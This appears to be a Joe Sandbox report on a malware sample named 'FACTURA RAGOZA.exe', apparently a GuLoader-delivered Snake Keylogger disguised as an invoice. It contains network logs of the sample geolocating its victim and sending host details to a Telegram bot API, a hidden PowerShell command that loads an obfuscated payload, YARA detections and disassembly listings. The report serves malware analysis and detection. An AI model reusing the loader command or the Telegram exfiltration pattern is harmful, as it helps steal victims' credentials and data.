2024-10-21 09:57:14 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:14 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30299 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=w%2F8yIEl36VAtbT2EtSPZhNXosZW1k0nn1dmhG5vuQzPeqvGIwkajQINM%2BEXIjT0HPZq3xuwMTLCFkLcK4qu%2BR9KnsBw8uCdiYmsorwcBPrW2ERbjghOIQXCA5D%2Fm9sXlh6CljbJ0"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061de2fb7e9b1-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1102&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2664213&cwnd=250&unsent_bytes=0&cid=c0f9ba29072862cb&ts=234&x=0"
2024-10-21 09:57:14 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:14 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	54181	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:15 UTC	63	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org
2024-10-21 09:57:16 UTC	898	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:16 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30301 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z7LpwzWPaw9Hy2BoFo995Z%2BsjKfpRhnzimGtZaiQKFr8gEnZEygkKS98eW%2BtvqNy14IvUcJz9puCBaDJHr9APaK%2FG97EOZBMp%2Bh1kaJx7gKct4rCbAe90AjjZUBxM%2FA2TORJV7Vb"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061e70aff474e-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1035&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=2674053&cwnd=243&unsent_bytes=0&cid=0efaa033b1e4c079&ts=146&x=0"
2024-10-21 09:57:16 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:16 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	54191	188.114.97.3	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:17 UTC	87	OUT	GET /xml/155.94.241.186 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-21 09:57:18 UTC	896	IN	HTTP/1.1 200 OK Date: Mon, 21 Oct 2024 09:57:18 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 30303 Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YUE3M4ncvJylyOO5jhvdSvuyE7mi9KGRv%2BSJvfwMeZBpy%2FWras4O5ajg%2Bb08VylTrNAMHkckFCc4SVAC28Ggm8oLdPK408f11aYcSw1kejR4dWK%2BRrCN1uDdREyP3szVcKLvnwzt"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8d6061f37c1e6b9b-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1052&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=2732075&cwnd=249&unsent_bytes=0&cid=e90969cb9039f372&ts=735&x=0"
2024-10-21 09:57:18 UTC	365	IN	Data Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
2024-10-21 09:57:18 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	54194	149.154.167.220	443	7552	C:\Windows\SysWOW64\msiexec.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-21 09:57:18 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:921702%0D%0ADate%20and%20Time:%2021/10/2024%20/%2020:10:26%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20921702%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-21 09:57:19 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Mon, 21 Oct 2024 09:57:19 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-21 09:57:19 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

Target ID:	0
Start time:	05:55:49
Start date:	21/10/2024
Path:	C:\Users\user\Desktop\FACTURA RAGOZA.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FACTURA RAGOZA.exe"
Imagebase:	0x400000
File size:	860'646 bytes
MD5 hash:	8B7D3863A10666B5B4FCA4230C413755
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	05:55:50
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"powershell.exe" -windowstyle hidden "$Bronzestbere203=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Eeriness.Jen';$Paaskedags=$Bronzestbere203.SubString(53880,3);.$Paaskedags($Bronzestbere203)"
Imagebase:	0x200000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.2248410739.000000000A4E6000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	05:55:50
Start date:	21/10/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	05:56:46
Start date:	21/10/2024
Path:	C:\Windows\SysWOW64\msiexec.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\msiexec.exe"
Imagebase:	0x940000
File size:	59'904 bytes
MD5 hash:	9D09DC1EDA745A5F87553048E57620CF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000006.00000002.2940688123.0000000023D68000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000006.00000002.2940688123.0000000023C61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	24.5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	23%
Total number of Nodes:	1250
Total number of Limit Nodes:	42

Executed Functions

Function 0040310F Relevance: 93.1, APIs: 33, Strings: 20, Instructions: 357
stringcomfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE ref: 00403134
GetVersion.KERNEL32 ref: 0040313A
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403163
#17.COMCTL32(00000007,00000009), ref: 00403185
OleInitialize.OLE32(00000000), ref: 0040318C
SHGetFileInfoA.SHELL32(00428828,00000000,?,00000160,00000000), ref: 004031A8
GetCommandLineA.KERNEL32(Formynderisk Setup,NSIS Error), ref: 004031BD
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\Desktop\FACTURA RAGOZA.exe",00000000), ref: 004031D0
CharNextA.USER32(00000000,"C:\Users\user\Desktop\FACTURA RAGOZA.exe",00000020), ref: 004031FB
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 004032F8
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403309
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403315
GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403329
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403331
SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 00403342
SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 0040334A
DeleteFileA.KERNELBASE(1033), ref: 0040335E

Part of subcall function 004060C8: GetModuleHandleA.KERNEL32(?,?,?,00403179,00000009), ref: 004060DA
Part of subcall function 004060C8: GetProcAddress.KERNEL32(00000000,?), ref: 004060F5

OleUninitialize.OLE32(?), ref: 0040340C
ExitProcess.KERNEL32 ref: 0040342D
GetCurrentProcess.KERNEL32(00000028,?), ref: 0040354A
OpenProcessToken.ADVAPI32(00000000), ref: 00403551
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403569
AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 00403588
ExitWindowsEx.USER32(00000002,80040002), ref: 004035AC
ExitProcess.KERNEL32 ref: 004035CF

Part of subcall function 00405525: MessageBoxIndirectA.USER32(00409218), ref: 00405580

Strings

1033, xrefs: 00403359
"C:\Users\user\Desktop\FACTURA RAGOZA.exe", xrefs: 004031C3, 004031C9, 00403382
`Kt, xrefs: 00403336
TEMP, xrefs: 0040333D
C:\Users\user\AppData\Local\Temp\, xrefs: 004032ED, 004032F2, 00403308, 00403314, 00403323, 00403330, 0040333C, 00403344, 0040343D, 0040344E, 00403459, 00403465, 00403472, 00403481, 00403530
TMP, xrefs: 00403345
\Temp, xrefs: 0040330F
", xrefs: 00403220
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian, xrefs: 004032DD, 004033DE, 00403488, 00403491
Low, xrefs: 0040332B
UXTHEME, xrefs: 00403157, 0040315C, 00403162
.tmp, xrefs: 00403454
C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer, xrefs: 004033E9
C:\Users\user\Desktop\FACTURA RAGOZA.exe, xrefs: 004034EA
Formynderisk Setup, xrefs: 004031B3
~nsu, xrefs: 00403438
NSIS Error, xrefs: 004031AE
Error launching installer, xrefs: 004033C4
SeShutdownPrivilege, xrefs: 00403563
C:\Users\user\Desktop, xrefs: 0040345F, 00403464, 00403490

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Process$Exit$EnvironmentFileHandleModulePathTempTokenVariableWindowslstrcat$AddressAdjustCharCommandCurrentDeleteDirectoryErrorIndirectInfoInitializeLineLookupMessageModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrlen
String ID: "$"C:\Users\user\Desktop\FACTURA RAGOZA.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian$C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Subjektiverer$C:\Users\user\Desktop$C:\Users\user\Desktop\FACTURA RAGOZA.exe$Error launching installer$Formynderisk Setup$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
API String ID: 3329125770-3158497939
Opcode ID: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
Instruction ID: 749ed98c63e487a66f460374afa67f5348490bcf6ac540fe4d7c6930d14d49f5
Opcode Fuzzy Hash: dcb38b1e2b76dc19c0501d8e0158ad62898b17a6a9361bfb335ac8dc35fe19f6
Instruction Fuzzy Hash: E1C105306086416AE7216F61AC4DA6F3EACEF46706F04457FF541BA1E3C77C9A058B2E

Function 004048C5 Relevance: 65.2, APIs: 33, Strings: 4, Instructions: 481
windowmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(?,000003F9), ref: 004048DD
GetDlgItem.USER32(?,00000408), ref: 004048E8
GlobalAlloc.KERNEL32(00000040,?), ref: 00404932
LoadBitmapA.USER32(0000006E), ref: 00404945
SetWindowLongA.USER32(?,000000FC,00404EBC), ref: 0040495E
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404972
ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404984
SendMessageA.USER32(?,00001109,00000002), ref: 0040499A
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 004049A6
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 004049B8
DeleteObject.GDI32(00000000), ref: 004049BB
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 004049E6
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004049F2
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404A87
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404AB2
SendMessageA.USER32(?,00001100,00000000,?), ref: 00404AC6
GetWindowLongA.USER32(?,000000F0), ref: 00404AF5
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00404B03
ShowWindow.USER32(?,00000005), ref: 00404B14
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404C11
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404C76
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404C8B
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404CAF
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404CCF
ImageList_Destroy.COMCTL32(?), ref: 00404CE4
GlobalFree.KERNEL32(?), ref: 00404CF4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404D6D
SendMessageA.USER32(?,00001102,?,?), ref: 00404E16
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404E25
InvalidateRect.USER32(?,00000000,00000001), ref: 00404E45
ShowWindow.USER32(?,00000000), ref: 00404E93
GetDlgItem.USER32(?,000003FE), ref: 00404E9E
ShowWindow.USER32(00000000), ref: 00404EA5

Strings

vs, xrefs: 00404E4B
M, xrefs: 00404A6E
N, xrefs: 00404B4F
, xrefs: 00404E7D

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N$vs
API String ID: 1638840714-3752743222
Opcode ID: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
Instruction ID: ee94c2e81ac7fcd3d2633371b1ae487f30220c2a0e0de663c2dd45f1c85c3c3c
Opcode Fuzzy Hash: 98e2d7c6ee6a234b068a5e6a8c88a9cece07b0d44b3c2dcd542ae9ed88053873
Instruction Fuzzy Hash: D70262B0A00209AFEB20DF55DC45AAE7BB5FB84315F14413AF610BA2E1C7799D51CF58

Function 00405D51 Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 199
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersion.KERNEL32(?,00429048,00000000,00404F80,00429048,00000000), ref: 00405E02
GetSystemDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E7D
GetWindowsDirectoryA.KERNEL32(Space required: ,00000400), ref: 00405E90
SHGetSpecialFolderLocation.SHELL32(?,0041C205), ref: 00405ECC
SHGetPathFromIDListA.SHELL32(0041C205,Space required: ), ref: 00405EDA
CoTaskMemFree.OLE32(0041C205), ref: 00405EE5
lstrcatA.KERNEL32(Space required: ,\Microsoft\Internet Explorer\Quick Launch), ref: 00405F07
lstrlenA.KERNEL32(Space required: ,?,00429048,00000000,00404F80,00429048,00000000), ref: 00405F59

Strings

Space required: , xrefs: 00405D78, 00405E4A, 00405E67, 00405E7C, 00405E8F, 00405EAB, 00405ED6, 00405F06, 00405F0C, 00405F24, 00405F37, 00405F52, 00405F58, 00405F63, 00405F8D
\Microsoft\Internet Explorer\Quick Launch, xrefs: 00405F01
vs, xrefs: 00405D5E
Software\Microsoft\Windows\CurrentVersion, xrefs: 00405E4C

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskVersionWindowslstrcatlstrlen
String ID: Software\Microsoft\Windows\CurrentVersion$Space required: $\Microsoft\Internet Explorer\Quick Launch$vs
API String ID: 900638850-2556916788
Opcode ID: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
Instruction ID: d2d5afd6cadd1c558da9919d7f7a0e519c97b97f5b6dedc277a7ce0050389877
Opcode Fuzzy Hash: 672f3ffac8e58b905acbb07927a48302432eebfa17072ae61d639ec34a28093f
Instruction Fuzzy Hash: 99610671A04916ABEF216B24DC85BBF7BA8DB15314F10813BE941BA2D1D33C4942DF9E

Function 004055D1 Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 159
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DeleteFileA.KERNELBASE(?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 004055FA
lstrcatA.KERNEL32(0042A870,\*.*,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405642
lstrcatA.KERNEL32(?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405663
lstrlenA.KERNEL32(?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405669
FindFirstFileA.KERNEL32(0042A870,?,?,?,00409014,?,0042A870,?,?,74DF3410,C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040567A
FindNextFileA.KERNEL32(00000000,00000010,000000F2,?,?,?,00000000,?,?,0000003F), ref: 00405727
FindClose.KERNEL32(00000000), ref: 00405738

Strings

"C:\Users\user\Desktop\FACTURA RAGOZA.exe", xrefs: 004055D1
C:\Users\user\AppData\Local\Temp\, xrefs: 004055DE
\*.*, xrefs: 0040563C

Memory Dump Source

Source File: 00000000.00000002.1701324859.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1701307731.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701342439.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701360195.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000442000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000446000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1701463733.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_FACTURA RAGOZA.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\Desktop\FACTURA RAGOZA.exe"$C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3893229374
Opcode ID: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
Instruction ID: d14c28ea715dd5a13497ef66355ac6b33f8f035006b682f92d24d725560d25e8
Opcode Fuzzy Hash: 2b7e5661b8b3b760765e09419aafe74f52747e63502cbb40739d7b63bde2251d
Instruction Fuzzy Hash: 0D51CF30800A44AADF21AB258C85BBF7AB8DF92754F54447BF404761D2D73C8982EE6E

